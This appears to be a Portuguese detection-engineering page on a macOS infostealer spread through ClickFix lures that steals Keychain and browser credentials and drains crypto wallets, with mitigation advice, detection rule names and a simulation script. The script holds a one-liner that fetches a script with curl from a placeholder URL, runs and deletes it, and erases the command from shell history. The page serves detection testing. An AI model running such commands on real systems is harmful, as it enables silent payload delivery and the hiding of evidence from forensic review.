macOS Infostealer Alvo Cryptomoedas
Detection stack
- AIDR
- Alert
- ETL
- Query
Resumo
Um ladrão de macOS baseado em Go está atacando usuários de criptomoedas através de uma campanha de engenharia social chamada ClickFix. O malware rouba credenciais sensíveis do Apple Keychain e dos armazenamentos de navegador, além de ter a capacidade de esvaziar gradualmente os saldos de criptomoedas das carteiras das vítimas. A cadeia de infecção começa com um script de shell profiler que entrega payloads Mach-O específicos de arquitetura.
Investigação
Os analistas da Huntress descobriram a ameaça durante uma caçada retrospectiva e identificaram componentes de um ladrão específico para macOS que permaneceram ativos por cerca de três meses. A investigação vinculou a infraestrutura de suporte ao Aeza Group, um provedor de hospedagem à prova de balas russo sancionado. Pesquisadores reconstruíram a cadeia de ataque desde o prompt inicial de engenharia social do ClickFix até a execução final do payload e comunicação C2.
Mitigação
Os usuários devem evitar interagir com prompts de CAPTCHA suspeitos ou seguir instruções incomuns que exijam comandos a serem inseridos no Terminal. Extensões de navegador projetadas para restringir scripts maliciosos, como NoScript, e ferramentas de bloqueio baseadas em DNS, como Pi-hole, podem ajudar a reduzir a exposição. Treinamento abrangente de conscientização de usuário focado em engenharia social ClickFix permanece uma das defesas mais eficazes.
Resposta
Se uma infecção for detectada, o sistema macOS afetado deve ser isolado imediatamente para impedir mais exfiltração de dados ou esgotamento da carteira de criptomoedas. Os administradores devem localizar e remover todos os binários Mach-O maliciosos e seus mecanismos de persistência associados. Como o malware tem como alvo credenciais, as senhas de todas as contas acessadas a partir do dispositivo comprometido devem ser redefinidas.
Fluxo de Ataque
Detecções
Bootstrap do Launchctl de Caminho Não-Padrão (via criação de processo)
Proof of Value
Possível Tentativa de Enumeração System_profiler (via criação de processo)
Proof of Value
Tentativa Suspeita de Execução Curl [MacOS] (via linha de comando)
Proof of Value
IOCs (HashSha256) para detectar: Malware macOS que esvazia carteiras quer suas criptomoedas
Proof of Value
IOCs (SourceIP) para detectar: Malware macOS que esvazia carteiras quer suas criptomoedas
Proof of Value
IOCs (DestinationIP) para detectar: Malware macOS que esvazia carteiras quer suas criptomoedas
Proof of Value
Detecção de Técnicas de Persistência e Execução de Malware macOS [Evento de Arquivo Linux]
Proof of Value
Ataque de Malware de macOS que Esvazia Carteiras [Criação de Processo Linux]
Proof of Value
Execução de Simulação
Pré-requisito: O Check Pre-flight de Telemetria & Baseline deve ter sido aprovado.
Justificativa: Esta seção detalha a execução precisa da técnica do adversário (TTP) projetada para acionar a regra de detecção. Os comandos e a narrativa DEVEM refletir diretamente os TTPs identificados e têm como objetivo gerar a telemetria exata esperada pela lógica de detecção. Exemplos abstratos ou não relacionados levarão a um diagnóstico incorreto.
-
Narrativa de Ataque & Comandos: O adversário inicia um golpe ClickFix. A vítima é enganada para executar um comando em seu terminal. O comando usa
curl -kFsSLpara baixar um script malicioso silenciosamente. Para evitar deixar rastro, o script é executado via uma linha única de bash que exclui imediatamente seu próprio arquivo temporário (.UlaccK). Finalmente, o atacante executa um comando complexohistorypara remover cirurgicamente o comando do histórico do shell do usuário, tornando o ataque invisível à inspeção forense casual. -
Script de Teste de Regressão:
#!/bin/bash # Simulação do Ataque de Malware ClickFix macOS # Este script imita os padrões exatos de string exigidos pela regra de detecção. echo "[+] Iniciando Simulação..." # 1. Simular o download do curl (Seleção 3) # 2. Simular a execução do bash e exclusão imediata (Seleção 1) # 3. Simular a manipulação do histórico (Seleção 2) # Combinamos esses em uma única linha para imitar o padrão comportamental # Nota: Usamos uma URL fictícia para evitar execução real do malware curl -kFsSL https://raw.githubusercontent.com/dummy/malware/main/payload.sh > /dev/null 2>&1 && bash .UlaccK && rm -f .UlaccK && history -d $(history 1 2>/dev/null | awk '{print $1}') echo "[+] Comando de Simulação Executado." echo "[!] Verifique seu SIEM para o alerta de 'Ataque de Malware de macOS que Esvazia Carteiras'." -
Comandos de Limpeza:
# Remover quaisquer artefatos deixados pela simulação rm -f .UlaccK # Nota: Manipulação de histórico no script destina-se a simular evasão; # restauração manual do histórico pode ser necessária para o usuário de teste.